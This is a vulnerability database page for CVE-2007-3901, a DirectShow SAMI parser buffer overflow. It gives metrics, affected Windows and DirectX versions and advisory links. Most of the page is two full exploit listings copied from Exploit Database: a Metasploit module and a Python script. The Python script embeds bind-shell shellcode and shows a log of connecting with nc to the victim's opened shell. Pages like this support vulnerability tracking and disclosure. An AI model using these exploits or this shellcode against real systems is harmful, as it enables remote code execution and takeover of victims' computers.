CVE-2007-3901 : Detail

CVE-2007-3901

Overflow
78.15%V4
Network
2007-12-11
23h00 +00:00
2018-10-15
18h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Stack-based buffer overflow in the DirectShow Synchronized Accessible Media Interchange (SAMI) parser in quartz.dll for Microsoft DirectX 7.0 through 10.0 allows remote attackers to execute arbitrary code via a crafted SAMI file.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics Score Severity CVSS Vector Source
V2 8.5 AV:N/AC:M/Au:S/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 16442

Publication date : 2010-10-04 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: ms07_064_sami.rb 10550 2010-10-05 01:05:49Z mc $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft DirectX DirectShow SAMI Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the DirectShow Synchronized Accessible Media Interchanged (SAMI) parser in quartz.dll. This module has only been tested with Windows Media Player (6.4.09.1129) and DirectX 8.0. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision: 10550 $', 'References' => [ [ 'CVE', '2007-3901' ], [ 'OSVDB', '39126' ], [ 'MSB', 'MS07-064' ], [ 'BID', '26789' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 600, 'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 Pro SP4 English', { 'Offset' => 22412, 'Ret' => 0x75022ac4 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Dec 11 2007', 'DefaultTarget' => 0)) end def on_client_connect(client) return if ((p = regenerate_payload(client)) == nil) client.get_once buffer = make_nops(target['Offset'] - payload.encoded.length) + payload.encoded buffer << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') buffer << make_nops(10) + [0xe8, -485].pack('CV') + rand_text_english(132324) header = "HTTP/1.1 200 OK\r\n" header << "Content-Type: application/smil\r\n\r\n" body = "<SAMI>\r<HEAD>\r<STYLE TYPE=\"text/css\">\r" body << "<!--\rP {font-size: 1em;\rfont-family: Arial;\r" body << "font-weight: normal;\rcolor: #FFFFFF;\r" body << "background: #FFFFFF;\rtext-align: center;\r" body << "padding-left: 2px;\rpadding-right: 2px;\r" body << "padding-bottom: 2px;\r}\r.ENUSCC { Name: English; lang: EN-US-CC; }\r" body << "-->\r</STYLE>\r</HEAD>\r<BODY>\r" body << "<SYNC Start=\"0\" pippo=\"" + buffer body << "\"><P Class=\"ENUSCC\"></P></SYNC></BODY></SAMI>" sploit = header + body print_status("Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...") client.put(sploit) handler(client) service.close_client(client) end end
Exploit Database EDB-ID : 4866

Publication date : 2008-01-07 23h00 +00:00
Author : ryujin
EDB Verified : Yes

#!/usr/bin/python ########################################################################## # Bug discovered by Jun Mao of VeriSign iDefense # https://www.securityfocus.com/bid/26789 # CVE-2007-3901 # Coded by Matteo Memelli aka ryujin # http://www.gray-world.net http://www.be4mind.com # Tested on: Windows 2000 SP4 English, DirectX 7.0 (4.07.00.0700) #------------------------------------------------------------------------ # THX TO all the guys at www.offensive-security.com # EXPECIALLY TO ONE: THX FOR "NOT" HELPING MUTS!!! # I DONT FEEL FC4'd ANYMORE NOW :P muhahahaha #------------------------------------------------------------------------ ########################################################################## # On Windows Media Player Open---> http://attacker/anyfile.smi # .smi extension is necessary, filename can be anything. # # badrobot:/home/matte# ./mplayer.py # [+] Listening on port 80 # [+] Connection accepted from: 192.168.1.243 # [+] Payload sent, check your shell on 192.168.1.243 port 4444 # badrobot:/home/matte# nc 192.168.1.243 4444 # Microsoft Windows 2000 [Version 5.00.2195] # (C) Copyright 1985-2000 Microsoft Corp. # # C:\Documents and Settings\ryujin\Desktop>ipconfig # ipconfig # # Windows 2000 IP Configuration # # Ethernet adapter Local Area Connection: # # Connection-specific DNS Suffix . : # IP Address. . . . . . . . . . . . : 192.168.1.243 # Subnet Mask . . . . . . . . . . . : 255.255.255.0 # Default Gateway . . . . . . . . . : # # C:\Documents and Settings\ryujin\Desktop> ########################################################################## from socket import * # SMI BODY body = """<SAMI> <HEAD> <STYLE TYPE="text/css"> <!-- P { font-size: 1em; font-family: Arial; font-weight: normal; color: #FFFFFF; background: #000000; text-align: center; padding-left: 5px; padding-right: 5px; padding-bottom: 2px; } .ENUSCC { Name: English; lang: EN-US-CC; } --> </STYLE> </HEAD> <BODY> <SYNC Start="0" pippo=\"""" # Metasploit bind shell on port 4444 EXITFUNC seh shellcode = ( "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66" "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6" "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0" "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff" "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff" "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64" "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab" "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51" "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6" "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0" ) body += 21988*'A' body += '\x90'*16 # NOP Slide body += shellcode + 'C'*67 # to SEH... body += '\xeb\x06\x90\x90\x2b\x1e\xe1\x77' # ShortJmp, and SEH overwrite body += '\x90'*4 + '\xE9\x6B\xFE\xFF\xFF\x90\x90' # NearJmp, back to shellcode body += 143505*'E' + '">' body += '<P Class="ENUSCC">NICE MOVIE!</P></SYNC></BODY></SAMI>' # RESPONSE HEADER header = ( 'HTTP/1.1 200 OK\r\n' 'Content-Type: application/smil\r\n' '\r\n' ) evilbuf = header + body s = socket(AF_INET, SOCK_STREAM) s.bind(("0.0.0.0", 80)) s.listen(1) print "[+] Listening on port 80" c, addr = s.accept() print "[+] Connection accepted from: %s" % (addr[0]) c.recv(1024) c.send(evilbuf) print "[+] Payload sent, check your shell on %s port 4444" % addr[0] c.close() s.close() # milw0rm.com [2008-01-08]

Products Mentioned

Configuraton 0

Microsoft>>Windows_2000 >> Version *

Microsoft>>Windows_2003_server >> Version datacenter_edition

    Microsoft>>Windows_2003_server >> Version enterprise_edition

      Microsoft>>Windows_2003_server >> Version standard

        Microsoft>>Windows_2003_server >> Version web_edition

          Microsoft>>Windows_vista >> Version *

          Microsoft>>Windows_xp >> Version *

          Microsoft>>Windows_xp >> Version *

          Microsoft>>Directx >> Version 5.2

          Microsoft>>Directx >> Version 6.1

          Microsoft>>Directx >> Version 7.0

          Microsoft>>Directx >> Version 7.0a

          Microsoft>>Directx >> Version 7.1

          Microsoft>>Directx >> Version 8.0

          Microsoft>>Directx >> Version 8.0a

          Microsoft>>Directx >> Version 8.1

          Microsoft>>Directx >> Version 8.1a

          Microsoft>>Directx >> Version 8.1b

          Microsoft>>Directx >> Version 8.2

          Microsoft>>Directx >> Version 9.0a

          Microsoft>>Directx >> Version 9.0b

          Microsoft>>Directx >> Version 9.0c

          Microsoft>>Directx >> Version 10.0

          References

          http://www.iss.net/threats/280.html
          Tags : third-party-advisory, x_refsource_ISS
          http://www.kb.cert.org/vuls/id/804089
          Tags : third-party-advisory, x_refsource_CERT-VN
          http://www.securityfocus.com/bid/26789
          Tags : vdb-entry, x_refsource_BID
          http://www.securitytracker.com/id?1019073
          Tags : vdb-entry, x_refsource_SECTRACK
          http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=632
          Tags : third-party-advisory, x_refsource_IDEFENSE
          http://secunia.com/advisories/28010
          Tags : third-party-advisory, x_refsource_SECUNIA
          https://www.exploit-db.com/exploits/4866
          Tags : exploit, x_refsource_EXPLOIT-DB
          http://www.us-cert.gov/cas/techalerts/TA07-345A.html
          Tags : third-party-advisory, x_refsource_CERT
          http://www.vupen.com/english/advisories/2007/4180
          Tags : vdb-entry, x_refsource_VUPEN